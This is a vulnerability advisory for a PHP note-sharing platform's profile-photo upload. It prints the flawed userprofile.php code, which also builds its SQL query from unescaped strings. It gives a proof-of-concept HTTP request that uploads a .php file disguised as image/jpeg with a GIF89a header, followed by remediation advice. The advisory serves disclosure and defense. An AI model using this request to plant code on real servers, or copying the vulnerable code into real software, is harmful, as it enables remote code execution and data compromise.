## Critical Vulnerability Summary ### Affected Product - Online note-sharing platform ### Version - V1.0 ### Vulnerability Type - Unrestricted Upload ### Root Cause - In the `userprofile.php` file, input received via `$_FILES` is not validated or sanitized, and is directly used to determine the file storage location. The vulnerable code snippet is as follows: ```php if (isset($_POST['uploadphoto'])) { $image = $_FILES['image']['name']; $ext = $_FILES['image']['type']; $validExt = array("image/gif", "image/jpeg", "image/pjpeg", "image/png"); if (empty($image)) { $picture = $profilepic; } else if ($_FILES['image']['size'] 1024000) { echo "alert('Image size is not proper'); window.location.href='userprofile.php';"; } else if (!in_array($ext, $validExt)) { echo "alert('Not a valid image'); window.location.href='userprofile.php';"; } else { $folder = 'profilepics/'; $imgext = strtolower(pathinfo($image, PATHINFO_EXTENSION)); $picture = rand(1000, 1000000) . '.' . $imgext; if (move_uploaded_file($_FILES['image']['tmp_name'], $folder . $picture)) { $queryupdate = "UPDATE users SET image = '$picture' WHERE id = '$userid'"; $result = mysqli_query($conn, $queryupdate) or die(mysqli_error($conn)); if (mysqli_affected_rows($conn) > 0) { echo "alert('Profile Photo uploaded successfully');"; } } } ``` ### Impact - Attackers can exploit this vulnerability to perform unrestricted file uploads, leading to file overwrites, file injection, directory traversal attacks, and denial-of-service (DoS). Remote attacks may also result in Remote Code Execution (RCE). ### Vulnerability Details and PoC - The file upload functionality is triggered by `userprofile.php`, and uploaded files are received via the `$_FILES` variable. Due to the lack of proper input validation and sanitization, remote attackers can inject malicious payloads through the file upload mechanism, resulting in unrestricted file uploads and potentially leading to Remote Code Execution (RCE). ### Example Exploit Payload ```http POST http://10.151.161.83:8822/dashboard/userprofile.php HTTP/1.1 Host: 10.151.161.83:8822 Content-Length: 43118 Cache-Control: max-age=0 Origin: http://10.151.161.83:8822 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydAAI7GZA34BSrv95 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://10.151.161.83:8822/dashboard/userprofile.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=okjv80qgsssm1k176l9ft762f6 Connection: keep-alive ------WebKitFormBoundarydAAI7GZA34BSrv95 Content-Disposition: form-data; name="image"; filename="[000000000.php" Content-Type: image/jpeg GIF89a ------WebKitFormBoundarydAAI7GZA34BSrv95 Content-Disposition: form-data; name="uploadphoto" upload photo ------WebKitFormBoundarydAAI7GZA34BSrv95-- ``` ### Recommended Remediation 1. Strictly validate file types using a whitelist of allowed extensions and verify MIME types. 2. Validate file content by checking file signatures to confirm actual file types, and reject files containing malicious scripts. 3. Sanitize filenames by generating random unique names and removing special characters to prevent path traversal. 4. Set file size limits via server configuration. 5. Store uploaded files securely, preferably outside the web root directory; if web access is required, disable script execution in the upload directory.